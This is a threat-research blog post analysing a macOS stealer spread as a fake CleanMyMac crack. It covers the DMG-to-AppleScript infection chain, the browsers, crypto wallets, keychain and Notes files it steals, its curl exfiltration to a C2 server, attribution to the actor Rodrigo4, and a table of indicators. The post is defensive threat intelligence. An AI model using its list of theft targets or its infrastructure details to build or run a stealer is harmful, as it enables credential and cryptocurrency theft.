Moonlock Lab

Hacker deploys macOS stealer disguised as CleanMyMac crack

Kseniia Yamburh

Jun 4, 20245 min read

Hacker deploys macOS stealer disguised as CleanMyMac crack (Header image)

A new threat has emerged that is targeting macOS users. At Moonlock Lab, we discovered a malware sample that has evaded detection on VirusTotal since its first submission on May 17, 2024.

Most notable is that this time, we find a tie between this strain and a particular threat actor. Plus, this stealer leverages osascript to execute its malicious payload, making it difficult to detect.

A screenshot of VirusTotal showing 0 flags.

Under the hood of the macOS stealer

It’s worth noting that the osascript script is downloaded from a fake domain and executed through the system() function. This is an old trick that allows it to remain hidden for some time.

A screenshot of the osascript downloaded from a fake domain.

The primary payload, a Mach-O file, is distributed via DMG installers with file names such as Launcher.dmg or CleanMyMacCrack.dmg.

Considering the name, it is probable that the infection chain started from downloading a cracked app. Downloading cracked apps is a dangerous practice that we outlined in a previous article.

An image showing the CleanMyMacCrack.dmg launcher.

This file downloads an AppleScript from hxxps://forked-project[.]com/check_updates and executes it using the system command.

A screenshot of the AppleScript downloaded from forked-project[.]com.

Notably, this version of the stealer is signed, a feature not observed in previous iterations.

It’s also important to mention that this time, the attackers did not use a phishing bypass of Gatekeeper with an installer image. Instead, they utilized a team ID.

An image from the script showing developer ID certification.

The script sets up directories and paths, verifies user credentials, and collects data from various sources, including browsers, files, and system information. It then transmits the collected data to a server using the “curl” command.

A close examination of the stealer’s script reveals the specific browsers and cryptocurrency wallets it targets. 

A screenshot revealing the browsers and crypto wallets targeted by the script.

How the script works

Here is a detailed breakdown of what the script does:

  • Collects user information: The script retrieves the current username using the command system attribute USER. It then stores the username and other system-related paths for further operations.
  • Sets up directories: The script creates a temporary directory to store the stolen data before exfiltration.
  • Extracts browser data: Several browsers are targeted by the script to collect sensitive information. This information includes browsing history, cookies, saved passwords, and other user data. Targeted browsers include Google Chrome, Brave, Microsoft Edge, Vivaldi, Opera, OperaGX, and Firefox.
  • Extracts cryptocurrency wallet data: A key function of the script is to identify and access directories where popular cryptocurrency wallets store their data. From there, it can steal wallet files, potentially allowing the attacker to access the victim’s crypto assets. Wallets targeted include Electrum, Coinomi, Exodus, Atomic Wallet, Wasabi Wallet, Ledger Live, Feather (Monero), Bitcoin Core, Litecoin Core, Dash Core, Electrum-LTC, Electron Cash, Guarda Wallet, Dogecoin Core, Binance, and TonKeeper.
  • Collects specific files and data: The script copies the login.keychain-db file, which contains macOS keychain data, potentially including passwords and other sensitive credentials. It also grabs data from the Apple Notes application, extracting NoteStore.sqlite and associated files. Plus, it steals cookies from Safari by accessing Cookies.binarycookies.
  • Gathers general user information: General user information is also collected, possibly including system details, user activities, and other relevant metadata.
  • Exfiltrates data: After collecting the necessary files and data, the script likely prepares the data for exfiltration.

After all this, the script uses the send_data(writemind) function to send the collected data to the attacker’s server hxxp://79.137.192.4/p2p.

An image of the send_data(writemind) script function.

Infection chain

The infection chain begins when a user visits a pirated software site and downloads a file named CleanMyMacCrack.dmg, believing it to be a cracked version of CleanMyMac. Upon launching the DMG file, a Mach-O file is executed, which then downloads an AppleScript from hxxps://forked-project[.]com/check_updates. This AppleScript is executed via the system command, creating a temporary directory for data collection. The script proceeds to steal sensitive information, including browser cookies, passwords, and cryptocurrency wallet data. Finally, the stolen data is compressed and sent to a Command and Control (C2) server at hxxp://79[.]137[.]192[.]4/p2p

Infection chain for the macOS stealer disguised as a CleanMyMac crack

Attribution

This stealer is allegedly linked to Rodrigo4, a notorious Russian-speaking threat actor active on the XSS underground forum. In a post on XSS, Rodrigo4 was seen seeking partners to distribute the stealer through SEO manipulation and Google Ads, suggesting this as their possible method of distribution.

A screenshot of a post by Rodrigo4 on XXS.

Moonlock Lab has noticed the stealer communicates with its command-and-control (C2) server at hxxp://79.137.192.4. An investigation into this IP address revealed an authorization form (hxxp://79.137.192.4/login/). The form closely resembles others found in posts advertised by Rodrigo4 on the XSS forum, suggesting a direct connection to the threat actor.

A screenshot of the authorization form linked to Rodrigo4.
An image showing the total statistics for the threat actor linked to the macOS stealer.
An image showing more known details about the threat actor linked to the macOS stealer.

Further, we discovered a logo associated with Rodrigo4 on the server (hxxp://79.137.192.4/assets), providing additional evidence of this link.

A screenshot of the assets page on the server under investigation.
A browser window showing a logo potentially linked to Rodrigo4, discovered on the server under investigation.

Our findings were bolstered by the keen observations of @birchb0y, a senior detection engineer from Huntress, who shed light on the payload’s rising popularity among Atomic Stealer variants over the past 6 months.

The observation connects the dots from 79.137.192.4 using URLScan.io, uncovering related URLs such as rodrigos[.]io. This trail led to an A record for 185.172.128[.]72, a real hive of crypto-related domains.

A screenshot of the post by user @birchb0y about the macOS stealer.
A screenshot of a post by @birchb0y related to Atomic Stealer.

Conclusion

The discovery of this hidden stealer strain highlights the increasing diversity of cyber threats. Linked to the known threat actor Rodrigo4 and using advanced evasion methods, this malware poses a danger to macOS users.

Here are several tips to help you protect yourself from this macOS malware:

  • Be cautious with downloads: Only download software from trusted sources, such as the official App Store or verified websites. Also, avoid clicking on suspicious links or email attachments.
  • Keep software updated: Always install the latest updates for your macOS and applications. Updates often include security patches that fixes to vulnerabilities.
  • Use security software: Use reputable anti-malware software, such as CleanMyMac X powered by Moonlock Engine, and regularly scan your system for threats.

Indicators of Compromise (IOC)

IndicatorsIndicator TypeDescription
30b89622c779dd06faa909e7e0b8e88f3b75ca78fad00c4cf0ef7db320e3b218SHA256Mach-O 
30b89622c779dd06faa909e7e0b8e88f3b75ca78fad00c4cf0ef7db320e3b218SHA256DMG
79[.]137[.]192[.]4IPAtomic Stealer C2
109[.]120[.]178[.]3IPAtomic Stealer C2
pixelcommunity[.]xyzDomainAssociated Domain
newparadigm[.]devDomainAssociated Domain
mantanetwork[.]devDomainAssociated Domain
rodrigos[.]ioDomainAssociated Domain
altllayer[.]comDomainAssociated Domain
lfgjupiter[.]comDomainAssociated Domain
earlymodenetwork[.]comDomainAssociated Domain
leaderwallets[.]orgDomainAssociated Domain
hxxps://forked-project[.]com/check_updatesURLPayload URL
hxxps[://]xss[.]is/threads/97296/URLRodrigo4 post on XSS
MoonLock Banner
Kseniia Yamburh Kseniia Yamburh
Kseniia is a malware research engineer at Moonlock, specializing in OSINT intelligence gathering and analysis. Her passion lies in writing about new investigations and findings in the field of cybersecurity.
You might also like
Moonlock 2024 macOS threat report (Header image)
Moonlock’s 2024 macOS threat report
Dec 3, 2024
14 min read
Kseniia Yamburh for OFTW: Confronting the surge of macOS stealers in 2024 (Header image)
Kseniia Yamburh for OFTW: Confronting the surge of macOS stealers in 2024
Oct 10, 2024
15 min read
macOS stealer posing as Loom is allegedly linked to the Crazy Evil group (Header image)
macOS stealer posing as Loom may be linked to Crazy Evil group
Aug 1, 2024
5 min read